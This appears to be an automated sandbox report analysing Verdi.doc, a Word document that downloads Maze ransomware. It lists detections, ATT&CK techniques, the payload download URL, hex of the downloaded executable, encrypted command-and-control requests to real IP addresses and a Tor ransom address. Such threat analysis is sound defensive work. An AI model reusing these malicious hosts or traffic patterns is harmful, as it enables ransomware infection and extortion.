Loading ...

Play interactive tourEdit tour

Analysis Report Verdi.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:992382
Start date:06.11.2019
Start time:14:01:16
Joe Sandbox Product:Cloud
Overall analysis duration:0h 9m 6s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Verdi.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9
EGA Information:
  • Successful, ratio: 50%
HDC Information:
  • Successful, ratio: 17.8% (good quality ratio 17.1%)
  • Quality average: 95.2%
  • Quality standard deviation: 19.8%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, WMIADAP.exe, conhost.exe, mscorsvw.exe, VSSVC.exe, svchost.exe
  • Execution Graph export aborted for target WINWORD.EXE, PID 3180 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Report size getting too big, too many NtWriteFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Maze
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample does not show any behavior and checks for the installed Java version. Likely requires a different JRE version.
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsWindows Management Instrumentation1Startup Items2Startup Items2Software Packing21Credential Dumping1Security Software Discovery31Remote File Copy14Man in the Browser1Data Encrypted11Remote File Copy14
Replication Through Removable MediaScripting11Registry Run Keys / Startup Folder2Process Injection1Scripting11Network SniffingFile and Directory Discovery11Taint Shared Content1Data from Local System11Exfiltration Over Other Network MediumStandard Cryptographic Protocol2
Drive-by CompromiseExploitation for Client Execution32Hidden Files and Directories1Path InterceptionFile Deletion1Input CaptureSystem Information Discovery22Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information1Credentials in FilesQuery Registry1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol23
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading21Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferConnection Proxy1
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceHidden Files and Directories1Brute ForceApplication Window Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskProcess Injection1Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://104.168.198.208/wordupd.tmpAvira URL Cloud: Label: malware
Antivirus or Machine Learning detection for dropped fileShow sources
Source: C:\Windows\Temp\wupd12.14.tmpAvira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmpAvira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
Source: C:\Windows\Temp\wupd12.14.tmpJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmpJoe Sandbox ML: detected
Antivirus or Machine Learning detection for sampleShow sources
Source: Verdi.docAvira: detection malicious, Label: VBA/Dldr.Agent.xgnwi
Source: Verdi.docJoe Sandbox ML: detected
Multi AV Scanner detection for submitted fileShow sources
Source: Verdi.docVirustotal: Detection: 50%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 5.2.wupd12.14.tmp.560000.6.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 5.2.wupd12.14.tmp.4c0000.5.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 5.0.wupd12.14.tmp.400000.0.unpackAvira: Label: TR/AD.MazeRansom.gvzeo

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_0042300D EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,5_2_0042300D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004028C4 EncryptionDisable,5_2_004028C4
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_00403ECB EncryptionDisable,5_2_00403ECB
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004268A0 EncryptionDisable,5_2_004268A0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 EntryPoint,EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,EnumChildWindows,EnumChildWindows,LsaFreeMemory,HeapAlloc,EqualDomainSid,LsaFreeMemory,EqualDomainSid,DestroyWindow,LsaClose,DeferWindowPos,SelectPalette,5_2_004219E0

Spreading:

barindex
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpSystem file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpSystem file written: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: wordupd[1].tmp.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\Temp\wupd12.14.tmpJump to behavior
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80

Networking:

barindex
Found Tor onion addressShow sources
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmpString found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmpString found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Source: notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmpString found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Nov 2019 13:02:48 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Tue, 29 Oct 2019 17:33:53 GMTETag: "b0e00-59610051d4240"Accept-Ranges: bytesContent-Length: 724480Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 98 74 b8 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 06 00 84 09 00 00 7e 01 00 00 06 00 00 f7 11 00 00 00 90 09 00 00 90 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 72 03 0c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 0
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /wordupd.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.198.208Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /signout/login/ct.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s
Source: global trafficHTTP traffic detected: POST /signout/login/ct.html HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)
Source: global trafficHTTP traffic detected: POST /forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.11Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgU
Source: global trafficHTTP traffic detected: POST /frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.25Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G
Source: global trafficHTTP traffic detected: POST /post/yocs.jspx?mh=gvs58 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.26Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=
Source: global trafficHTTP traffic detected: POST /checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.32Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgU
Source: global trafficHTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.37Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_
Source: global trafficHTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.37Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_
Source: global trafficHTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global trafficHTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Length: 49Cache-Control: no-cacheData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global trafficHTTP traffic detected: POST /view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.11Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global trafficHTTP traffic detected: POST /tracker/lpvotht.php?ij=74lh01y&if=3h00sur HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.25Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global trafficHTTP traffic detected: POST /weu.html?n=641&uy=33vt2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.26Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global trafficHTTP traffic detected: POST /edit/signout/r.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.38Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sO
Source: global trafficHTTP traffic detected: POST /edit/signout/r.html HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.38Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
